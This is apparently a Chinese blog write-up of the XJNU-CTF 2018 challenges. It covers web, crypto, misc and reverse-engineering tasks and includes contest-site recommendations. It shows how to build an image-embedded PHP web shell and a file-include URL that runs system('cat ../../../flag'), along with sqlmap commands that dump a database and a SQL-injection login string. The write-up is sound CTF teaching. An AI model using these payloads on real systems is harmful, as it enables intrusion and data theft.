XJNU-CTF 2018 writeup  v1.0

最新推荐文章于 2023-12-25 23:41:40 发布
最新推荐文章于 2023-12-25 23:41:40 发布
阅读量1.1k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36265860/article/details/82832398
版权

XJNU CTF writeup  v1.0

 

前几天学弟说学校举办了ctf,由于有一些了解,也比较有自己的看法,因此就打算来做一做他们ctf 的题,这是做出来的一部分ctf的题,希望想要入门的朋友能够借鉴参考,了解思路和ctf中的套路。

WEB 100

打开连接之后是可以上传文件

尝试几次后发现,只能上传图片文件,而且有一个非常重要的地方就是,看下他的网址是

没有错,这是include,那么就是说可以上传图片木马了。

准备好图片,准备好木马new1.php,然后创建一个文件a.bat,里面的内容就是cmd,这样我们可以在本文夹内打开cmd窗口。

接下来双击a.bat,cmd下输入copy misc100.jpg/b+New1.php new.jpg

然后上传带有木马的new.jpg文件

这个时候就可以构造payload了

几次尝试之后可以得到

http://ctf.xjnu.edu.cn:666/index.php?file=upload/new.jpg&pass=system(%22cat%20../../../flag%22);

 

Web 20

进去之后是你不属于这里。看来ip不对,这个时候需要伪造ip,

用burn suit截获,添加

出现

把login的内容改掉

又出现

然后在qq浏览器,F12选择移动设备模式,把设备换成iPhone X

刷新,把User-Agent:的内容也改掉

返回了一个空白页,查看源代码,看到一行注释

于是到burn suit里面看返回的包,可以找到flag

 

Web10

进去之后是

很明显是sqlmap注入,测试一下

果然,于是SQlmap走起

查数据库版本

py -2 sqlmap.py -u "http://ctf.xjnu.edu.cn:9900/web10/?id=1" --batch

查出是mysql数据库

查数据库

py -2 sqlmap.py -u "http://ctf.xjnu.edu.cn:9900/web10/?id=1" --current-db  --batch

当前数据库是web1

查数据表

py -2 sqlmap.py -u "http://ctf.xjnu.edu.cn:9900/web10/?id=1" -D web1 --tables  --batch

可以看到flag表

查看flag表的列名

py -2 sqlmap.py -u "http://ctf.xjnu.edu.cn:9900/web10/?id=1" -D web1 -T flag --columns  --batch

查询列的内容,得到flag。

py -2 sqlmap.py -u "http://ctf.xjnu.edu.cn:9900/web10/?id=1" -D web1 -T flag -C "flag" --dump --batch

 

 

Base10

打开之后

查看源代码

所以遮住的数字是。。。图片旋转一下,怎么样?

欧克。数字是87

取前五位

构造flag

flag{Math_is_Here_c7e12!}

 

Base20

这个,,,百度上搜一下题目先

嗯。。。。

https://www.theguardian.com/science/alexs-adventures-in-numberland/2015/apr/13/how-to-solve-albert-bernard-and-cheryls-birthday-maths-problem

 

嗯。。。。

所以

flag{Th0_Jack_Birth_Is_July_16}

 

Base30

编程题。。。这个数值比较大的话,适合python

sum=0
for num in range(0,1000000000):
       if num%3==0:
              sum+=num
       else:
              if num%5==0:
                     sum+=num
print(sum)

233333333166666668

base 40

666c61677b4a7573745f743373745f683476335f66346e5f6861686168615f36363636217d

嗯。。。http://www.bejson.com/convert/ox2str/

flag{Just_t3st_h4v3_f4n_hahaha_6666!}

 

Base 50

题目:小明常用密码是hash 是5bc76f3f319865431dcab801bbce47a1 现在 他只知道明文密码的前四位是xjnu
中间是66****88 后三位是ctf 请帮他算出 明文密码是啥
flag{明文} 

那还是直接跑python脚本吧

#coding=utf8

from hashlib import md5
from hashlib import sha1
from hashlib import sha224
from hashlib import sha384
from hashlib import sha512
import hashlib
 
#__all__ = ('md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512', 'new', 'algorithms_guaranteed', 'algorithms_available', 'pbkdf2_hmac')
#Python计算字符串的hash值
def hashForString(method,srcbyte):
    #将字符串和汉字转化成byte类型
    srcbyte = srcbyte.encode(encoding='utf-8')
      
    #new(name, data=b'')
    #testnew = hashlib.new(method,data=srcbyte).hexdigest()
    #print(testnew)
    
    if method == 'md5': 
        m = md5()
        m.update(srcbyte)
        srcbyte = m.hexdigest()
    elif method == 'sha1':
        s = sha1()
        s.update(srcbyte)
        srcbyte = s.hexdigest()
    elif method == 'sha224':
        s = sha224()
        s.update(srcbyte)
        srcbyte = s.hexdigest()
    elif method == 'sha384':
        s = sha384()
        s.update(srcbyte)
        srcbyte = s.hexdigest()
    elif method == 'sha512':
        s = sha512()
        s.update(srcbyte)
        srcbyte = s.hexdigest()
    return srcbyte
CSet='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*()_-+=/*<>:;\'"[]{}|'
for num1 in CSet:
    for num2 in CSet:
        for num3 in CSet:
            for num4 in CSet:
                str1="xjnu66"+str(num1)+str(num2)+str(num3)+str(num4)+"88ctf"
                #print(str1)
                if(hashForString("md5",str1)=="5bc76f3f319865431dcab801bbce47a1"):
                    print("xjnu66"+str(num1)+str(num2)+str(num3)+str(num4)+"88ctf")
    print(num1)
print("完")

 

 

MISC 10

签到题,关注以后。。。发个私信

Misc 15

打开之后是

然后用notepad++打开搜一下flag,嗯。

 

Misc 20

 

Binwalk先跑一下

有两张图片。那就把5B74之前的内容用winhex删掉。也可以用foremost

但是我没有那个东西。

 

Misc30

老样子,用notepad++打开,

乱码,但是如果换一下编码的话,

Hi你来到了这里说明你很想知道答案,但是我这里只有中文,没有你想要的答案,参考马克思主义基本原理概论这本书的第三十五页第二个字到第五个字的拼音组成就是你想要的答案,骚年加油!

。。。卒

补充:最后这四个字是:去伪存真.在2018版的马克思主义原理概论这本书里才有.

 

Misc40

 

是一个word文档,里面是一些内容。

全选,加个背景色

 

然而并没有什么用。

但是。不要慌。

万能的notepad++

Misc 80

是一个二维码

扫出来没有什么有用的东西。

先用notepad++打开看一下把

拉到最后是一串数字。数字最大是7,应该是8进制,

上python脚本

#coding=utf-8
import chardet

a=b"\146\154\141\147\173\110\141\166\145\137\171\060\125\137\120\171\137\163\143\162\151\160\164\137\117\164\143\137\124\157\137\124\145\156\137\101\163\143\151\151\041\175"
#a = b"\345\260\274\345\217\244\346\213\211\346\226\257\350\265\265\345\233\233"
#判断当前字符串的格式(编码类型)
fencoding = chardet.detect(a)  

print(fencoding)
#编码类型为打印出来的fencoding编码类型
a = a.decode('utf-8')
print(a)

flag{Have_y0U_Py_script_Otc_To_Ten_Ascii!}

Re50

 

是一个入门级别的re,还是很不错的。

放到IDA里面,IDA还是强大!

查了一下汇编语言,指针的位置,放值

看来,后面的值就是flag

于是16进制解码

666c61677b52655F31735F53305F43304F4C7D

flag{Re_1s_S0_C0OL}

qq_36265860
关注
NJUST CTF 2018 Writeup
qq_37820590的博客
03-17 2171
NJUST CTF 2018 Writeup Supernova, Nanjing Universityfrostwing98,Trap,Arcadia MISC1 签到by Arcadia一路调戏ai之后(误)可以得到一串base64编码的字符串,在线解码得到flagMISC2 GIFby frostwing98下载到gif,发现是不断闪烁的黑/白画面,第一考虑是莫尔斯电码。首先http://tu
picoCTF2018 Writeup之Web Exploitation
zwish的信安之路
09-16 1766
My New Website 打开发现是个登录界面,随便输入账号密码登陆成功,然后发现cookie里面有个admin字段为false,改为True(一定要大写) 得到flag:picoCTF{l0g1ns_ar3nt_r34l_92020990} Irish Name Repo 没有任何过滤的注入,直接到/admin登录页面,使用万能密码admin' or '1'='1登录即可 my r...
CTF 湖湘杯 2018 WriteUp (部分)
weixin_33804990的博客
11-25 358
湖湘杯 2018 WriteUp (部分),欢迎转载,转载请注明出处https://www.cnblogs.com/iAmSoScArEd/p/10016564.html! 1、 CodeCheck(WEB) 测试admin ‘ or ‘1’=’1’# ,php报错。点击登录框下面的滚动通知,URL中有id=b3FCRU5iOU9IemZYc1JQSkY0WG5JZz09,想到注入,但是不...
XJNU-CTF 2018
weixin_33946020的博客
09-25 212
闲来无事,最近在做CTF题,感觉再不练练手我就废了。 1.本地文件包含+文件上传拿flag 地址题目:http://ctf.xjnu.edu.cn:666/ 1.png 题目分析: 看到题目,有两种思路:1).利用文件上传拿webshell,然后找到flag; 2).利用文件包...
ctf——writeup
Child_by_dream的博客
01-17 405
线上ctf大赛——第二关地址:http://106.75.86.18:3333提示:seelog首先访问网址,有一段显示内部网络,无法访问,如图。然后根据提示,让我们访问网站日志文件,http://106.75.86.18:3333/log可以看到有access.log和error.log日志文件,我们在access.log中查找到内网访问成功的日志文件。我们可以看到本条日志文件,内网访问成功。我
auth-server:认证服务器
07-01
认证服务器 共享身份验证服务 建造 ./gradlew build 只运行 api-gateway ./gradlew :bootRun 由于此错误而无法工作 - 而是以旧时尚的方式做...... java -jar auth-server.jar 运行所有应用程序 ...
linux/php一句话图片马及实例
热门推荐
极光时流
09-24 1万+
Ubuntu一句话图片马 准备一张图片tu.jpeg、phpinfo.php和hack.php; Phpinfo.php文件内容: hack.php文件内容: 准备一个16进制软件UE(UltraEdit),linux下载地址:https://www.cr173.com/soft/265552.html 以及装有hackbar的火狐; 中国菜刀,下载地址:https://down...
mysql存储过程增量更新
08-18
SELECT xjnu_temp_project.id, xjnu_temp_project.xjnu_name, xjnu_temp_project.xjnu_projectname, xjnu_temp_project.xjnu_yixk, xjnu_temp_project.xjnu_zjxy FROM xjnu_temp_project WHERE ( NOT EXISTS ( ...
MySQL 增量更新
sinat_16022089的博客
09-25 7658
          由于导入excel需要,不能导入重复的数据,如何想到了通过临时表的方式来实现增量更新。。主要原理就是,先把数据插入到临时表中,通过select连接语句,把重复数据查询出来,通过NOT EXISTS剔除重复数据,把临时表中与主表不同的数据导入进来。从而实现增量更新的目的。想着提高效率,就把语句放到了MySQL存储过程中来执行,可以提高运行的效率。主要SQL语句如下: DROP ...
Python读写txt文本文件的操作方法全解析
Winnycatty的博客
11-14 2796
一、文件写入(慎重,小心别清空原本的文件) 步骤:打开 -- 写入 -- (保存)关闭 直接的写入数据是不行的,因为默认打开的是'r' 只读模式 使用r+ 模式不会先清空,但是会替换掉原先的文件,如下面的例子:hello boy! 被替换成hello aay! path='G:\Python学习/test1.txt' f=open(path,'r+') f.write('hello aa!'...
[CTF] 2018-百越杯-Misc-血小板天下第一可爱
ZXW_NUDT的博客
08-15 1631
[CTF] 2018-百越杯-Misc-血小板天下第一可爱
canvas教程18-刮刮乐
William_fang的博客
08-02 413
文章目录一.刮刮乐二.效果图篇章 一.刮刮乐 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"&g
2018巅峰极客writeup(Misc)
Mistsatan
07-30 4407
2018巅峰极客writeup(Misc) 作为一个渣渣,带着去看各路神仙打架的想法报名了这次的“巅峰极客”CTF比赛,7.21第一场线上赛果然从头水到尾。。。 为了方便之后巩固,把近几天学习大佬们的writeup过程中总结整理的内容记录下来,第一次写成博客。
网鼎2018CTF第四场 _Crypto
Rorschach:Blog
08-30 1947
0x0 shenyue 理清代码流程,按照给的注册流程跑一遍 ==== administration console ==== 1. sign up 2. log in 3. private key generation -1. command execution &gt; 1 id: 123 pw: 123 successfully registered &gt; 2 id: 123 pw:...
ctf模拟赛题解
最新发布
m0_74924621的博客
12-25 1481
显示f14g列名:b80bb7740288fda1f201890375a60c8f,327a6c4304ad5938eaf0efb6cc3e53dc。题目提示了支持中文,就可以想到宽字节,登陆之后发现有一个显示位,可以通过联合查询得到flag。发现可控的变量,已经知道是PHP的程序,我们开始用变量构造页面,构造一个phpinfo吧。只允许上传类型中有zip类型,那么可以将一句话木马压缩成zip文件上传,用蚁剑连接。查看index.bak:发现file:///和php://被禁用。
ByteCTF2021 Crypto - easyxor writeup
风好衣轻
10-21 877
easyxor shift函数是个常见的移位异或操作,convert是对一个数字使用不同的key和mask进行4次移位异或,这个函数在已知key的情况下是可逆的。 encrypt函数是对明文块进行两种模式(CBC和OFB)的块加密,块长度为8,对于每一块的加密使用的就是上面的convert函数。 首先通过密文的长度可以得知一共被分成了6块;前3块明文使用OFB模式,后三块明文使用CBC模式;keys是一个长度为4的列表,列表中每个值的范围是(-32, 32),64464^4644爆破也是可以接受的。 读完题
CTF攻防世界web题思路解析2robot
m0_63687631的博客
12-22 1937
1.得到了网址,打开;发现是个空白页 2.然后查看一下源码,发现flag不在这儿 3.然后结合一下题,查下下robot协议;得到robot协议就是告诉爬虫这个网址里面有东西不能被搜到,然后改变网址查下什么内容不能被搜到,在网址后加/robots.txt,然后访问得到这个 4.根据简单翻译,user-agent是使用者代理的意思,disallow是驳回的意思,所以结合robots协议,就是使用者代理告诉我们disallow的内容被驳回了,导致我们不能正常访问,所以我们在网址后边加上这些/..
WebView通过URL加载H5界面出现空白的原因与解决办法
sx638的博客
03-19 1万+
1.权限问题:在配置文件中需要设置网络权限&lt;uses-permission android:name="android.permission.INTERNET" /&gt;2.基本配置问题WebSettings webSettings = webView.getSettings(); //支持缩放,默认为true。 .setUseWideViewPort(true); // 缩放至屏幕的大小...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值